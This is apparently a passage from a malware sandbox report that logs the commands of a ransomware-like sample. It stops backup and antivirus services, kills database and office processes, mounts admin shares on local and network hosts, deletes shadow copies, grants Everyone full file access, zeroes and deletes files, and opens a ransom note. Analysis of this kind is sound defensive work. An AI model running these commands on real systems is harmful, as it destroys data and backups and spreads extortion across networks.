C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Users2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\A$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\B$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\C$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\D$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\E$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\F$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\G$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\H$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\I$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\J$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\K$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\L$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\M$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\N$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\O$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\Users2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\P$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Q$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\A$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\R$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\B$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\S$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\C$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\D$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\T$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\E$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\U$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\F$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\Users2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\A$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\G$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\V$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\W$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\H$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\B$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\C$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\I$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\X$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\D$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\J$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Y$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\E$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Z$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\K$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\F$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\L$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\G$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\M$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\N$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\H$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\O$2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\I$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\P$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\J$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\Q$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\K$2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\L$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\R$2⤵
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\S$2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\M$2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\N$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\T$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\O$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\U$2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\P$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\V$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\Q$2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\W$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\R$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\X$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\S$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\Y$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\Z$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\T$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\U$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\V$2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18\W$2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\net_shares.exe2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/296-124-0x0000000000000000-mapping.dmp
-
memory/416-122-0x0000000000000000-mapping.dmp
-
memory/540-145-0x0000000000000000-mapping.dmp
-
memory/572-140-0x0000000000000000-mapping.dmp
-
memory/1224-129-0x0000000000000000-mapping.dmp
-
memory/1248-128-0x0000000000000000-mapping.dmp
-
memory/1252-136-0x0000000000000000-mapping.dmp
-
memory/1328-144-0x0000000000000000-mapping.dmp
-
memory/1348-132-0x0000000000000000-mapping.dmp
-
memory/1524-139-0x0000000000000000-mapping.dmp
-
memory/1564-125-0x0000000000000000-mapping.dmp
-
memory/1836-143-0x0000000000000000-mapping.dmp
-
memory/1848-185-0x0000023BBC820000-0x0000023BBC821000-memory.dmpFilesize
4KB
-
memory/1848-188-0x0000023BD4FE0000-0x0000023BD4FE1000-memory.dmpFilesize
4KB
-
memory/1848-189-0x0000023BD4E50000-0x0000023BD4E52000-memory.dmpFilesize
8KB
-
memory/1848-190-0x0000023BD4E53000-0x0000023BD4E55000-memory.dmpFilesize
8KB
-
memory/1848-202-0x0000023BD4E56000-0x0000023BD4E58000-memory.dmpFilesize
8KB
-
memory/2112-142-0x0000000000000000-mapping.dmp
-
memory/2128-141-0x0000000000000000-mapping.dmp
-
memory/2144-180-0x0000000000000000-mapping.dmp
-
memory/2320-121-0x0000000000000000-mapping.dmp
-
memory/2408-117-0x0000000000000000-mapping.dmp
-
memory/2476-138-0x0000000000000000-mapping.dmp
-
memory/2892-126-0x0000000000000000-mapping.dmp
-
memory/2932-135-0x0000000000000000-mapping.dmp
-
memory/2948-137-0x0000000000000000-mapping.dmp
-
memory/2984-118-0x0000000000000000-mapping.dmp
-
memory/3092-130-0x0000000000000000-mapping.dmp
-
memory/3340-119-0x0000000000000000-mapping.dmp
-
memory/3488-134-0x0000000000000000-mapping.dmp
-
memory/3616-146-0x0000000000000000-mapping.dmp
-
memory/3808-127-0x0000000000000000-mapping.dmp
-
memory/3912-131-0x0000000000000000-mapping.dmp
-
memory/3936-133-0x0000000000000000-mapping.dmp
-
memory/3964-123-0x0000000000000000-mapping.dmp
-
memory/3968-116-0x0000000000F00000-0x0000000000F02000-memory.dmpFilesize
8KB
-
memory/3968-114-0x00000000007A0000-0x00000000007A1000-memory.dmpFilesize
4KB
-
